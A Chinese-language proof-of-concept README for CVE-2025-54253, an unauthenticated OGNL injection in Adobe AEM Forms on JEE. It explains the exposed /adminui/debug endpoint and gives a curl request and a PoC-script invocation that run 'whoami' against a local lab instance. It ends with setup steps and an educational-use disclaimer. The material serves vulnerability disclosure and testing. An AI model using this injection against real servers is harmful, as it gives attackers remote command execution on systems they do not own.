CVE-2025-54253 是 Adobe AEM Forms on JEE 中的一个严重 OGNL 注入漏洞。它允许未经身份验证的攻击者通过 /adminui/debug?debug=OGNL: 端点执行任意操作系统命令。
该漏洞存在于一个暴露的调试接口中,该接口在未进行适当清理或身份验证的情况下就会评估用户可控的 OGNL 表达式。利用该漏洞可在应用程序服务器的上下文中实现远程代码执行。
📝 注意: 该漏洞影响那些在公共或内部网络中暴露
/adminui/debug端点且没有适当访问控制的安装。
简单的 OGNL 表达式即可演示通过浏览器或 curl 执行命令。
curl "http://localhost:4502/adminui/debug?debug=OGNL:whoami"
python3 poc/cve-2025-54253-poc.py --url http://127.0.0.1:4502 --cmd "whoami"
该脚本将命令执行输出记录到 exploit.log:
搭建一个存在漏洞的 Adobe AEM 实例(<= 6.5.23.0)。
启动 Flask 服务器(如果在本地模拟):

在浏览器中执行 OGNL:

通过 curl 执行:

命令输出:



Flask 日志视图:

运行 PoC 脚本:

详细日志视图:

/adminui/debug 的访问⚠️ 免责声明:
本 PoC 仅供教育目的使用。请不要将其用于您不拥有或未经明确许可测试的系统。
Shivshant Patil
认证道德黑客(CEH v13)
计算机工程专业工学学士
🔗 LinkedIn
🔗 GitHub